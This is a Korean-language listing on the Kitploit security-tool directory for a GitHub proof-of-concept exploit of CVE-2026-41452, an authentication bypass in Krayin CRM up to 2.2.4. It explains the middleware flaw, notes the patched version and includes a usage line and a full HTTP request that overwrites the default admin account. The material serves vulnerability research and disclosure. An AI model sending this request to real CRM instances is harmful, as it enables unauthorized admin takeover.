Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41452-poc — CVE-2026-41452에 대한 개념 증명 익스플로잇으로, Krayin CRM <= 2.2.4의 치명적인 인증 우회 취약점이며 미들웨어 우회를 통해 인증되지 않은 관리자 계정 탈취를 허용합니다. | Kitploit
도구/GitHubGitHub/o-sec/cve-2026-41452-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingAuthentication
GitHubo-sec/cve-2026-41452-poc

CVE-2026-41452-poc

CVE-2026-41452에 대한 개념 증명 익스플로잇으로, Krayin CRM <= 2.2.4의 치명적인 인증 우회 취약점이며 미들웨어 우회를 통해 인증되지 않은 관리자 계정 탈취를 허용합니다.

저장소 보기
13시간 37분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-41452: 미들웨어 우회를 통한 Krayin CRM 관리자 계정 탈취

CVSS v3.1: 9.8 Critical Target: Krayin CRM <= 2.2.4 License: MIT

Krayin CRM 버전 2.2.4 이하에 영향을 미치는 치명적인 인증 누락 취약점(CVE-2026-41452)을 입증하는 개념 증명(PoC)입니다.

이 결함은 인증되지 않은 원격 공격자가 특정 HTTP 헤더를 주입하여 애플리케이션의 설치 미들웨어 로직(CanInstall)을 우회할 수 있게 하며, 그 결과 기본 관리자 계정 구성이 완전히 덮어쓰여집니다.

[!WARNING]
면책 조항: 이 저장소와 여기에 포함된 정보는 교육 목적, 보안 연구, 그리고 승인된 방어적 감사 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 테스트나 악용은 엄격히 불법입니다. 작성자는 이 자료의 어떠한 오용에 대해서도 책임을 지지 않습니다.


취약점 개요

  • CVE ID: CVE-2026-41452

  • 취약점 유형: 인증 누락 / 미들웨어 우회

  • 심각도: 치명적 (CVSS 9.8)

  • 영향받는 소프트웨어: Krayin CRM <= 2.2.4

  • 패치된 버전: Krayin CRM >= 2.2.5

기술적 설명

이 취약점은 애플리케이션의 설정 미들웨어 내에 존재합니다. 인증되지 않은 공격자는 /install/api/admin-config-setup 엔드포인트를 대상으로 하는 조작된 페이로드에 X-Requested-With: XMLHttpRequest 헤더를 추가할 수 있습니다. 이는 CanInstall 미들웨어 내에서 예상되는 리다이렉션 검사를 억제하여, 기본 시스템 관리자의 하드코딩된 ID(1)를 대상으로 하는 인증되지 않은 updateOrInsert 데이터베이스 작업을 노출시킵니다.


개념 증명 (PoC)

사용법

테스트 권한이 있는 대상 인스턴스에 대해 스크립트를 실행하십시오:

root@kitploit:~
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>

HTTP 요청 예시

내부적으로, 우회는 다음과 같은 HTTP 트랜잭션 구조를 통해 트리거됩니다:

root@kitploit:~
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded

name=test1&[email protected]&password=Password123

참고 자료

  • nist cve-2026-41452 detail
도구 다운로드